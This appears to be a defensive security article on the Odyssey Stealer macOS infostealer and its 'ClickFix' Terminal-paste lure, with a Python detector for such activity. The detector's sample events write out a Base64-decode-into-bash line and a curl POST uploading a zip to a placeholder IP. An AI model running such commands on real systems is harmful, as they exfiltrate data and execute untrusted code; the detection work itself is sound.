The Odyssey Stealer: A Growing Global Threat to macOS Users

The long-standing myth that macOS is “immune” to malware is once again being challenged by the rise of a highly active information-stealing malware (infostealer) known as Odyssey Stealer.

While macOS users have historically faced fewer threats than Windows users, recent telemetry data from early 2026 shows a sharp surge in Odyssey Stealer activity. What began as a localized threat in the U.S., France, and Spain has now evolved into a global campaign spanning North America, Latin America, Europe, Asia, and Africa.


How the Odyssey Stealer Works

Unlike traditional viruses that exploit software bugs, Odyssey Stealer relies on social engineering. It targets the human element rather than the machine’s code.

The “ClickFix” Trap

The primary delivery method is a deceptive technique called “ClickFix.” Attackers create fake CAPTCHA verification pages that impersonate legitimate security checks or software update prompts (such as fake Microsoft Teams or Homebrew pages).

Instead of just clicking an “I am not a robot” checkbox, the user is instructed to:

  1. Copy a provided string of text (which is actually a Base64-encoded command).
  2. Open the Terminal on their Mac.
  3. Paste and execute the command.

By getting the user to run the command manually, the malware effectively bypasses many of the built-in browser and operating system security warnings that would normally block a direct file download.


What Is at Risk?

Odyssey Stealer is designed for one purpose: total data exfiltration. Once the command is executed, the malware quietly harvests:

  • Credentials: Saved passwords from Chrome, Firefox, and Safari.
  • Session Tokens: “Cookies” that allow attackers to bypass Multi-Factor Authentication (MFA) and log directly into active business accounts.
  • Cryptocurrency Wallets: Data from over 100 browser extensions, including MetaMask, as well as desktop apps like Ledger Live.
  • Sensitive Files: It scans Desktop and Documents folders for .pdf, .docx, .key, and .wallet files.

The Impact on Your Business

For businesses, the threat goes beyond a single infected laptop. Because infostealers capture session tokens, an attacker doesn’t even need a password to access your corporate environment.

The Reality Check: An attacker with a stolen session token can impersonate an employee on Slack, access internal AWS or Azure consoles, and move laterally through your network—all without triggering a “new login” alert.


How to Protect Your Team

Defending against Odyssey Stealer requires a shift from purely technical controls to user awareness.

  • Educate on “Terminal Phishing”: Remind employees that no legitimate website (like a CAPTCHA or a software portal) will ever ask them to copy and paste code into their Terminal or Command Prompt.
  • Enforce Managed Software: Ensure users only download tools from approved internal repositories or the official Mac App Store.
  • Monitor for Anomalies: Security teams should look for unusual osascript (AppleScript) executions or suspicious curl POST requests sending zipped data to unknown IP addresses.
  • Session Management: If a compromise is suspected, remember that a password reset is not enough. You must explicitly “Revoke all active sessions” in your SaaS platforms to invalidate stolen tokens.
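
To make the “Monitor for Anomalies” advice concrete, here is an added example (not code from this article or from any vendor tool) that runs three heuristics over process-execution events: a Base64 decode piped into a shell, osascript run inline from a shell, and a curl POST of a .zip file to a bare IP address. The event field names, the rule names, the known_ips allowlist and the sample events are all assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample events (not real telemetry). Assumed fields: parent process,
# process name, and the full command line as captured by shell or EDR logging.
EVENTS = [
    {"parent": "Terminal", "proc": "zsh", "cmd": "echo <BASE64_PLACEHOLDER> | base64 -d | bash"},
    {"parent": "bash", "proc": "osascript", "cmd": "osascript -e '<INLINE_SCRIPT_PLACEHOLDER>'"},
    {"parent": "bash", "proc": "curl", "cmd": "curl -X POST --data-binary @/tmp/out.zip http://203.0.113.7/upload"},
    {"parent": "zsh", "proc": "curl", "cmd": "curl -fsSL https://example.com/install.sh -o install.sh"},
    {"parent": "Script Editor", "proc": "osascript", "cmd": "osascript /Users/dev/build.scpt"},
]

SHELLS = {"sh", "bash", "zsh"}
# The ClickFix pattern from the article: decoded Base64 fed straight into a shell.
B64_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:/bin/)?(?:ba|z)?sh\b")
URL = re.compile(r"https?://[^\s'\"]+")

def posts_zip_to_bare_ip(cmd, known_ips):
    """True if curl uploads a .zip to an IP-literal host that is not allowlisted."""
    is_upload = re.search(r"-X\s*POST|--data(?:-binary)?\b|\s-[dF]\s", cmd)
    if not (is_upload and re.search(r"\.zip\b", cmd)):
        return False
    for url in URL.findall(cmd):
        host = urlsplit(url).hostname or ""
        try:
            if str(ipaddress.ip_address(host)) not in known_ips:
                return True
        except ValueError:
            pass  # a hostname, not an IP literal
    return False

def detect(event, known_ips=frozenset()):
    """Return the names of the heuristics that a single event trips."""
    cmd, hits = event["cmd"], []
    if B64_TO_SHELL.search(cmd):
        hits.append("base64-decode-piped-to-shell")
    if event["proc"] == "osascript" and event["parent"] in SHELLS and re.search(r"\s-e\s", cmd):
        hits.append("osascript-inline-from-shell")
    if event["proc"] == "curl" and posts_zip_to_bare_ip(cmd, known_ips):
        hits.append("curl-post-zip-to-ip")
    return hits

def triage(events, known_ips=frozenset()):
    """Map event index -> tripped heuristics, skipping clean events."""
    return {i: h for i, e in enumerate(events) if (h := detect(e, known_ips))}

if __name__ == "__main__":
    for idx, hits in triage(EVENTS).items():
        print(idx, EVENTS[idx]["cmd"], "->", ", ".join(hits))
```

These are triage heuristics, not verdicts: legitimate admin scripts can trip them, so tune the allowlist and parent-process conditions to your own fleet.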

The Bottom Line

The Odyssey Stealer is a reminder that as macOS adoption grows in the enterprise, so does the sophistication of the threats targeting it. By staying informed and training your team to spot these “verification” traps, you can keep your data and your business secure.
